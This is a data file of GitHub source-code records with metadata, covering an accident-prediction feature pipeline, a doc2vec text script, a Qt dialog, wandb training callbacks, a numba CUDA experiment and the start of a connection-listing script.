minimum_gap_size,\n rolling_type, minimum_train_size, minimum_val_size)):\n if split_num>0:\n break \n\n print(split)\n\n # Do the processing of the splits here. \n spine_train_local = return_timed_spine(spine_label, split['train_start'], split['train_end'])\n spine_val_local = return_timed_spine(spine_label, split['val_start'], split['val_end'])\n #Calcuate accident percentage \n pre_sample_train_local = spine_train_local\n experiment.TIME_GRANULARITY=60 ####REPLACE THIS LINE ONCE NEW experiment table is ready\n accident_pct_train_pre_sample=calculate_accident_pct(experiment.SEGMENTATION_TABLE,experiment.TIME_GRANULARITY,split['train_start'],split['train_end'],pre_sample_train_local)\n print(\"\"\"\n ####################\n ## NEGATIVE SAMPLING (TRAIN/VAL)\n ####################\"\"\")\n \n #Sampling\n if experiment.SAMPLE_TRAIN:\n print('Starting with Sampling for Train')\n print('Original Shape:', spine_train_local.shape)\n spine_train_local = sampler(conn=conn, spine=spine_train_local, start_date=split['train_start'], seed=experiment.RANDOM_SEED, end_date=split['train_end'], **experiment.TRAIN_SAMPLE_METHOD_PARAMS)\n \n print(spine_train_local.columns)\n\n if experiment.SAMPLE_VAL:\n print('Starting with Sampling for Val')\n spine_val_local = sampler(conn=conn, spine=spine_val_local, start_date=split['val_start'], seed=experiment.RANDOM_SEED,\n end_date=split['val_end'], **experiment.VAL_SAMPLE_METHOD_PARAMS)\n \n \n \n \n print('''\n ####################\n ## GENERATING LAG AND LAG_ROUNDED\n ####################''')\n\n timedelta = pd.Timedelta(value=experiment.TIME_LAG_MINUTES, unit='m')\n\n spine_train_local.loc[:,\"datetime_rounded_lag\"] = spine_train_local.datetime_rounded - timedelta\n spine_val_local.loc[:,\"datetime_rounded_lag\"] = spine_val_local.datetime_rounded - timedelta\n\n\n #### DATETIME LAG ROUNDED FOR JOINING TO KNMI\n #60m is hard-coded here KNMI granularity is hardcoded.\n spine_train_local.loc[:,\"datetime_rounded_lag_rounded_weather\"] = spine_train_local.loc[:,'datetime_rounded_lag'].dt.floor('60min')\n spine_val_local.loc[:,\"datetime_rounded_lag_rounded_weather\"] = spine_val_local.loc[:,'datetime_rounded_lag'].dt.floor('60min')\n\n \n #### DATETIME LAG ROUNDED FOR JOINING FLOW\n spine_train_local.loc[:,\"datetime_rounded_lag_rounded_flow\"] = spine_train_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_FLOW_CONFIG['time_granularity_min']))\n spine_val_local.loc[:,\"datetime_rounded_lag_rounded_flow\"] = spine_val_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_FLOW_CONFIG['time_granularity_min']))\n\n \n #### YEAR LAG FOR JOINING HECTOPUNTEN\n spine_train_local.loc[:,\"datetime_rounded_year_minus_one\"] = spine_train_local.datetime_rounded.map(lambda x: x.year - 1)\n spine_val_local.loc[:,\"datetime_rounded_year_minus_one\"] = spine_val_local.datetime_rounded.map(lambda x: x.year - 1)\n \n #### DATETIME LAG ROUNDED FOR JOINING ONGEVALLEN\n spine_train_local.loc[:,\"datetime_rounded_lag_rounded_ongevallen\"] = spine_train_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_ONGEVALLEN_CONFIG['time_granularity_min']))\n spine_val_local.loc[:,\"datetime_rounded_lag_rounded_ongevallen\"] = spine_val_local.loc[:,'datetime_rounded_lag'].dt.floor('{0}min'.format(experiment.FEATURES_ONGEVALLEN_CONFIG['time_granularity_min']))\n\n\n print('Spine Train: ')\n print(spine_train_local.shape)\n print('Spine Val ')\n print(spine_val_local.shape)\n\n \n \n \n print('''\n ####################\n ## JOINING FEATURES\n ####################''')\n\n \n print('''\n ####################\n ### KNMI\n ####################''')\n\n \n\n spine_train_local = pd.merge(spine_train_local, weather_station, on='hectokey_merged', how='left')\n spine_val_local = pd.merge(spine_val_local, weather_station, on='hectokey_merged', how='left')\n\n \n\n spine_train_local = pd.merge(spine_train_local, knmi_feature_table, \n left_on=['datetime_rounded_lag_rounded_weather','weather_station'],\n right_on=['datetime', 'weather_station'], how='left')\n\n spine_val_local = pd.merge(spine_val_local, knmi_feature_table,\n left_on=['datetime_rounded_lag_rounded_weather','weather_station'],\n right_on=['datetime','weather_station'], how='left')\n\n# print('Spine Label: ')\n# print(spine_label.shape)\n# print('Spine Test: ')\n# print(spine_test.shape)\n\n\n print('''\n #################\n ### HECTOPUNTENT\n #################''')\n\n \n\n spine_train_local = pd.merge(spine_train_local, hectopunten_feature_table,\n left_on=['datetime_rounded_year_minus_one','hectokey_merged'],\n right_on=['rollup_year','hectokey_merged'], how='left')\n\n spine_val_local = pd.merge(spine_val_local, hectopunten_feature_table,\n left_on=['datetime_rounded_year_minus_one','hectokey_merged'],\n right_on=['rollup_year','hectokey_merged'], how='left')\n\n\n\n# print('Spine Label: ')\n# print(spine_label.shape)\n# print('Spine Test: ')\n# print(spine_test.shape)\n\n print('''\n ########################\n ### JOINING FLOW FEATURES\n ########################''')\n\n\n\n spine_train_local = pd.merge(spine_train_local, flow_feature_table,\n left_on=['datetime_rounded_lag_rounded_flow','hectokey_merged'],\n right_on=['end_datetime','hectokey_merged'], how='left')\n\n spine_val_local = pd.merge(spine_val_local, flow_feature_table,\n left_on=['datetime_rounded_lag_rounded_flow','hectokey_merged'],\n right_on=['end_datetime','hectokey_merged'], how='left')\n\n # del(flow_feature_table)\n\n\n print('Spine Label: ')\n print(spine_train_local.shape)\n print('Spine Test: ')\n print(spine_val_local.shape)\n\n\n print('''\n ###############################\n #### GENERATE TEMPORAL FEATURES\n ###############################''')\n \n spine_train_local = pd.merge(spine_train_local, temporal_feature_table, left_on='datetime_rounded', right_on='datetime', how='left')\n spine_val_local = pd.merge(spine_val_local, temporal_feature_table, left_on='datetime_rounded', right_on='datetime', how='left')\n\n\n print('Spine Label: ')\n print(spine_train_local.shape)\n print('Spine Test: ')\n print(spine_val_local.shape)\n\n \n print('''\n ###############################\n #### JOINING ONGEVALLEN FEATURES\n ###############################''')\n \n \n spine_train_local = pd.merge(spine_train_local, ongevallen_feature_table, left_on=['datetime_rounded_lag_rounded_ongevallen', 'hectokey_merged'],\n right_on=['datetime', 'hectokey_merged'], how='left')\n \n spine_val_local = pd.merge(spine_val_local, ongevallen_feature_table, left_on=['datetime_rounded_lag_rounded_ongevallen', 'hectokey_merged'],\n right_on=['datetime', 'hectokey_merged'], how='left')\n \n \n \n space_time = {'space':spine_val_local['hectokey_merged'].tolist(), 'time':[str(dtr) for dtr in spine_val_local['datetime_rounded'].tolist()]}\n print('''\n #######################################\n #### SPINE RINSING OF UNWANTED COLUMNS\n #######################################''')\n\n \n\n spine_train_local = rinse_spines(spine_train_local)\n spine_val_local = rinse_spines(spine_val_local)\n # spine_test_local = rinse_spines(spine_test)\n\n\n \n \n #TODO! spine test doesn't need to be pre-process time and again. But for now let it be here.\n X_train, y_train, X_val, y_val = preprocessor(spine_train_local, spine_val_local, spine_test,\n label='accidents',\n numerical_cols=experiment.NUMERICAL_FEATURES_LIST,\n categorical_cols=experiment.CATEGORICAL_FEATURES_LIST,\n ignore_test=True)\n \n return X_train, y_train, X_val, y_val, pre_sample_train_local\n", "repo_name": "dssg/rws_accident_prediction_public", "sub_path": "src/models/feature_impact_review.py", "file_name": "feature_impact_review.py", "file_ext": "py", "file_size_in_byte": 15658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "32", "api": [{"api_name": "xgboost.XGBClassifier", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.ensemble.ExtraTreesClassifier", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.ensemble.AdaBoostClassifier", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.read_exp_utils.read_experiment", "line_number": 45, "usage_type": "call"}, {"api_name": "utils.read_exp_utils", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.argsort", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.sampler", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 149, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 153, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 163, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.temporal_split", "line_number": 166, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.return_timed_spine", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.return_timed_spine", "line_number": 175, "usage_type": "call"}, {"api_name": "utils.misc_utils.calculate_accident_pct", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.sampler", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.sampler", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 262, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 305, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 323, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 324, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 342, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.rinse_spines", "line_number": 355, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.rinse_spines", "line_number": 356, "usage_type": "call"}, {"api_name": "utils.orchestra_utils.preprocessor", "line_number": 363, "usage_type": "call"}]}
+{"seq_id": "6950204701", "text": "import re\r\nimport jieba # 结巴分词,将中文句子分成词语列表\r\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument # 用于进行doc2vec学习,将文章段落转化为向量\r\n\r\n\r\n# 从文件中按行读取数据并且去除空行,存储为一个list,返回该list\r\ndef get_data(in_file):\r\n data = []\r\n for i in open(in_file, 'r', encoding='utf-8').readlines():\r\n if i != '\\n':\r\n i = re.sub(r'\\n', '', i)\r\n data.append(i)\r\n return data\r\n\r\n\r\ndef wash_data(sentence):\r\n # 结巴分词\r\n seg_list = jieba.cut(sentence)\r\n # 去除停用词\r\n stopwords = open('stopword.txt', 'r', encoding='utf-8').read()\r\n stopwords = stopwords.split('\\n')\r\n corpus = []\r\n for i in seg_list:\r\n if i not in stopwords:\r\n corpus.append(i)\r\n return corpus\r\n\r\n\r\nmodel = Doc2Vec.load('model_0.0.1.md')\r\nd = get_data('medicine.txt')\r\nout_a = open('X.txt', 'w', encoding='utf-8')\r\n\r\ns1, s2, mdc = [], [], []\r\nfor line in d:\r\n if not re.search('【', line):\r\n s1.append(line)\r\n elif re.search('【组成】', line):\r\n line = re.sub('【组成】', '', line)\r\n m = line.split()\r\n s2.append(m[0])\r\n for x in m:\r\n if x not in mdc:\r\n mdc.append(x)\r\n elif re.search('【主治】', line):\r\n line = re.sub('【主治】', '', line)\r\n out_a.write(str(model.infer_vector(wash_data(line),alpha=0,min_alpha=0,steps=1))+'\\n')\r\nout_a.close()\r\n\r\nout_b = open('Y.txt', 'w', encoding='utf-8')\r\nout_b.write(str(mdc)+'\\n')\r\n\r\nfor i in range(len(s2)):\r\n y = [0] * len(mdc)\r\n j = mdc.index(s2[i])\r\n y[j] = 1\r\n out_b.write(s1[i]+'\\n')\r\n out_b.write(str(y)+'\\n')\r\nout_b.close()\r\n", "repo_name": "ccmeffeng/TCM", "sub_path": "zy_0.2.1.py", "file_name": "zy_0.2.1.py", "file_ext": "py", "file_size_in_byte": 1734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.sub", "line_number": 11, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 18, "usage_type": "call"}, {"api_name": "gensim.models.doc2vec.Doc2Vec.load", "line_number": 29, "usage_type": "call"}, {"api_name": "gensim.models.doc2vec.Doc2Vec", "line_number": 29, "usage_type": "name"}, {"api_name": "re.search", "line_number": 35, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 38, "usage_type": "call"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "38174837083", "text": "import logging\n\nfrom qtpy.QtWidgets import QDialog, QDialogButtonBox, QTextEdit, QVBoxLayout\n\nlogger = logging.getLogger(__name__)\n\n\nclass DialogViewMetadata(QDialog):\n def __init__(self):\n super().__init__()\n\n self.resize(500, 500)\n self.setWindowTitle(\"Run Metadata\")\n\n self.te_meta = QTextEdit()\n self.te_meta.setReadOnly(True)\n\n # 'Close' button box\n button_box = QDialogButtonBox(QDialogButtonBox.Close)\n button_box.accepted.connect(self.accept)\n button_box.rejected.connect(self.reject)\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.te_meta)\n vbox.addWidget(button_box)\n self.setLayout(vbox)\n\n def setText(self, text):\n self.te_meta.setText(text)\n", "repo_name": "NSLS-II/PyXRF", "sub_path": "pyxrf/gui_module/dlg_view_metadata.py", "file_name": "dlg_view_metadata.py", "file_ext": "py", "file_size_in_byte": 755, "program_lang": "python", "lang": "fa", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDialog", "line_number": 8, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTextEdit", "line_number": 15, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDialogButtonBox", "line_number": 19, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDialogButtonBox.Close", "line_number": 19, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "31047754712", "text": "import os\nfrom pathlib import Path\nfrom typing import Any, Dict, Optional\n\nimport numpy as np\nimport pytorch_lightning\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import Callback, LightningModule, Trainer\nfrom pytorch_lightning.callbacks import ModelSummary\nfrom pytorch_lightning.loggers import LoggerCollection, WandbLogger\nfrom pytorch_lightning.utilities import rank_zero_only\nfrom torch.optim import Optimizer\n\nimport wandb\nfrom capit.base import utils\n\nlogger = utils.get_logger(__name__)\n\n\ndef get_wandb_logger(trainer: Trainer) -> WandbLogger:\n \"\"\"Safely get Weights&Biases logger from Trainer.\"\"\"\n\n if trainer.fast_dev_run:\n raise ValueError(\n \"Cannot use wandb callbacks since pytorch lightning disables loggers in \"\n \"`fast_dev_run=true` mode.\"\n )\n\n if isinstance(trainer.logger, WandbLogger):\n return trainer.logger\n\n if isinstance(trainer.logger, LoggerCollection):\n for logger in trainer.logger:\n if isinstance(logger, WandbLogger):\n return logger\n\n raise ValueError(\n \"You are using wandb related callback, but WandbLogger was not found for \"\n \"some reason...\"\n )\n\n\nclass UploadCodeAsArtifact(Callback):\n \"\"\"Upload all code files to wandb as an artifact, at the beginning of the run.\"\"\"\n\n def __init__(self, code_dir: str):\n \"\"\"\n\n Args:\n code_dir: the code directory\n use_git: if using git, then upload all files that are not ignored by git.\n if not using git, then upload all '*.py' file\n \"\"\"\n self.code_dir = code_dir\n\n @rank_zero_only\n def on_train_start(self, trainer: Trainer, pl_module: LightningModule):\n logger = get_wandb_logger(trainer=trainer)\n experiment = logger.experiment\n\n code = wandb.Artifact(\"project-source\", type=\"code\")\n\n for path in Path(self.code_dir).resolve().rglob(\"*.py\"):\n code.add_file(str(path), name=str(path.relative_to(self.code_dir)))\n\n experiment.log_artifact(code)\n\n\nclass LogConfigInformation(Callback):\n \"\"\"Logs a validation batch and their predictions to wandb.\n Example adapted from:\n https://wandb.ai/wandb/wandb-lightning/reports/Image-Classification-using-PyTorch-Lightning--VmlldzoyODk1NzY\n \"\"\"\n\n def __init__(self, exp_config: DictConfig = None):\n super().__init__()\n self.done = False\n self.exp_config = exp_config\n\n @rank_zero_only\n def on_batch_start(self, trainer: Trainer, pl_module: LightningModule) -> None:\n if not self.done:\n logger = get_wandb_logger(trainer=trainer)\n\n trainer_hparams = trainer.__dict__.copy()\n\n hparams = {\n \"trainer\": trainer_hparams,\n \"config\": self.exp_config,\n }\n\n logger.log_hyperparams(hparams)\n self.done = True\n", "repo_name": "AntreasAntoniou/CAPIT", "sub_path": "capit/base/callbacks/wandb_callbacks.py", "file_name": "wandb_callbacks.py", "file_ext": "py", "file_size_in_byte": 2897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "capit.base.utils.get_logger", "line_number": 17, "usage_type": "call"}, {"api_name": "capit.base.utils", "line_number": 17, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 20, "usage_type": "name"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 29, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.LoggerCollection", "line_number": 32, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 34, "usage_type": "argument"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 20, "usage_type": "name"}, {"api_name": "pytorch_lightning.Callback", "line_number": 43, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 57, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 57, "usage_type": "name"}, {"api_name": "wandb.Artifact", "line_number": 61, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 63, "usage_type": "call"}, {"api_name": "pytorch_lightning.utilities.rank_zero_only", "line_number": 56, "usage_type": "name"}, {"api_name": "pytorch_lightning.Callback", "line_number": 69, "usage_type": "name"}, {"api_name": "omegaconf.DictConfig", "line_number": 75, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.utilities.rank_zero_only", "line_number": 80, "usage_type": "name"}]}
+{"seq_id": "72796762970", "text": "from numba import jit, vectorize\nfrom numba import cuda\nimport numpy as np\nimport math\n\nn = 1000000\nrho1 = np.random.uniform(0.5, 1.5, size=n).astype(np.float32)\ntheta1 = np.random.uniform(-np.pi, np.pi, size=n).astype(np.float32)\n\n\n@vectorize(['float32(float32,float32)'], target='cuda')\ndef hypot(x, y):\n return x * math.sqrt(1.+y*y)\n\n\n@cuda.jit(device=True, inline=True)\ndef H(x: np.float32):\n if x < 0.0 or x > 1.0:\n return 0.0\n if x == 0.0:\n return 0\n if x == 1.0:\n return 0\n return (-x*math.log(x)-(1-x)*math.log(1-x))/math.log(2)\n\n\n@cuda.jit(device=True, inline=True)\ndef binom(a: np.uint32, b: np.uint32):\n return a*b # TODO not implemented math.comb(a, b)\n\n\n@cuda.jit\ndef bbinom(c, a, b):\n idx = cuda.grid(1)\n c[idx] = binom(a[idx], b[idx])\n\n\n@cuda.jit(device=True, inline=True)\ndef binomH(a: np.float32, b: np.float32):\n return H(b/a)\n\n\n@cuda.jit\ndef bbinomH(c, a, b):\n idx = cuda.grid(1)\n c[idx] = binomH(a[idx], b[idx])\n\n\n@cuda.jit(device=True, inline=True)\ndef log2(a: np.uint32):\n return math.log(a, 2)\n\n\n@cuda.jit\ndef llog2(c, a):\n idx = cuda.grid(1)\n c[idx] = log2(a[idx])\n\n\n@cuda.jit\ndef hypot1(z, x, y):\n idx = cuda.grid(1)\n z[idx] = x[idx] * math.sqrt(1.+y[idx]*y[idx])\n\n\ndef opt_exp_mmt(k: np.float32, w: np.float32, mem: np.float32, mode: bool):\n \"\"\"\n mode = true\n \"\"\"\n mini_t = 0\n idx = np.uint32(cuda.grid(1))\n stride = np.uint32(cuda.gridsize(1))\n stride = np.float32(stride) * 0.0001\n\n p = np.float32(0.0001)*idx\n l = np.float32(0.0001)*idx\n\n while p < 0.01:\n p += stride\n while l < np.float32(1-k):\n l += np.float32(0.0005)\n # for l2 in float_range(0., 1.-k-w+p, 0.01):\n reps1 = binomH(p, p/2.)\n l1 = reps1\n l2 = l - l1\n\n if l1 < 0 or l2 < 0 or l > 1-k-w-p or (w-p) > (1.-k-l) or p >= k+l-w:\n continue\n\n tmp = binomH((k+l)/2, p/4.)\n L1 = tmp\n L2 = 2*L1 - (L1 if mode else l1)\n L3 = 2*L2 - l2 \n\n space = max(max(L1/2, L2), L3)\n #if space > mem:\n # continue\n\n perms = binomH(1, w) - binomH(1.-k-l, w-p) - binomH(k+l, p)\n run = max(max(L1, L2), L3)\n run += perms \n #+ (max(0, L1-l1) if mode else 0.)\n\n if run_ < mini_t:\n mini_t = run_\n return mini_t\n\n\ndata = hypot(rho1, theta1)\nprint(data)\n\nthreadsperblock = 32\nblockspergrid = (n + (threadsperblock - 1)) // threadsperblock\nd_rho = cuda.to_device(rho1)\nd_theta = cuda.to_device(theta1)\nd_z = cuda.device_array_like(rho1)\nhypot1[blockspergrid, threadsperblock](d_z, d_rho, d_theta)\ncuda.synchronize()\nprint(d_z.copy_to_host())\n\n\nA = cuda.to_device(np.random.uniform(0.0001, 0.4999, size=n).astype(np.float32))\nB = cuda.to_device(np.random.uniform(0.0001, 0.4999, size=n).astype(np.float32))\nC = cuda.device_array_like(A)\nbbinomH[blockspergrid, threadsperblock](C, A, B)\ncuda.synchronize()\nprint(C.copy_to_host())\n\n\nk = np.float32(0.8)\nw = np.float32(0.2)\nm = np.float32(1.0)\nopt_exp_mmt[blockspergrid, threadsperblock](k, w, m)\n\n", "repo_name": "FloydZ/numba_test", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.random.uniform", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 8, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 13, "usage_type": "call"}, {"api_name": "numba.vectorize", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 24, "usage_type": "call"}, {"api_name": "numba.cuda.jit", "line_number": 16, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.uint32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numba.cuda.jit", "line_number": 27, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 27, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 34, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 34, "usage_type": "name"}, {"api_name": "numba.cuda.jit", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numba.cuda.jit", "line_number": 38, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 38, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 45, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 45, "usage_type": "name"}, {"api_name": "numba.cuda.jit", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.uint32", "line_number": 50, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 51, "usage_type": "call"}, {"api_name": "numba.cuda.jit", "line_number": 49, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 49, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 56, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 56, "usage_type": "name"}, {"api_name": "numba.cuda.jit", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 54, "usage_type": "name"}, {"api_name": "numba.cuda.grid", "line_number": 62, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 62, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "numba.cuda.jit", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numba.cuda", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.uint32", "line_number": 71, "usage_type": "call"}, {"api_name": "numba.cuda.grid", "line_number": 71, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.uint32", "line_number": 72, "usage_type": "call"}, {"api_name": "numba.cuda.gridsize", "line_number": 72, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 81, "usage_type": "call"}, {"api_name": "numba.cuda.to_device", "line_number": 114, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 114, "usage_type": "name"}, {"api_name": "numba.cuda.to_device", "line_number": 115, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 115, "usage_type": "name"}, {"api_name": "numba.cuda.device_array_like", "line_number": 116, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 116, "usage_type": "name"}, {"api_name": "numba.cuda.synchronize", "line_number": 118, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 118, "usage_type": "name"}, {"api_name": "numba.cuda.to_device", "line_number": 122, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 122, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "numba.cuda.to_device", "line_number": 123, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 123, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numba.cuda.device_array_like", "line_number": 124, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 124, "usage_type": "name"}, {"api_name": "numba.cuda.synchronize", "line_number": 126, "usage_type": "call"}, {"api_name": "numba.cuda", "line_number": 126, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "23494923373", "text": "# -*- coding: utf-8 -*-\r\n# Se importa Popen que permite ejecutar comandos de Linux en Python\r\n# Se importa PIPE para manejar la salidas estandar\r\nfrom subprocess import Popen, PIPE\r\n\r\n# Se importa para desplegar mensajes en la salida estandar de errores.\r\nimport sys\r\n#import os\r\n\r\n# Se importa argparse para interpretar parametros\r\nimport argparse\r\nparser = argparse.ArgumentParser()\r\n\r\n# Funcion para normalizar el resultado del script bash\r\ndef normalizarlista(lista_conexiones_ej1):\r\n listaTemp = []\r\n for i in range(0, len(lista_conexiones_ej1)):\r\n listaTemp.append(lista_conexiones_ej1[i].split())\r\n\r\n return listaTemp\r\n\r\n# Funcion para imprimir lista ordenada\r\ndef imprimo_lista(listaConOrdenadas, cabecera, pie):\r\n print(\"{}\\t\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\\t\\t{}\".format(*cabecera))\r\n for i in range(0, len(listaConOrdenadas)):\r\n print(\"{}\\t\\t{}\\t\\t{}\\t\\t{} {} {}\\t\\t{} {}\\t{}\\t\\t{}\".format(*listaConOrdenadas[i]))\r\n print(\"\\r\")\r\n print(\"{} {} {} {} {} {} {} {} {} {} {} {} {}\".format(*pie))\r\n\r\ndef imprimo_lista_filtrada(listaConOrdenadas, cabecera, pie):\r\n # Se usa el reverso del 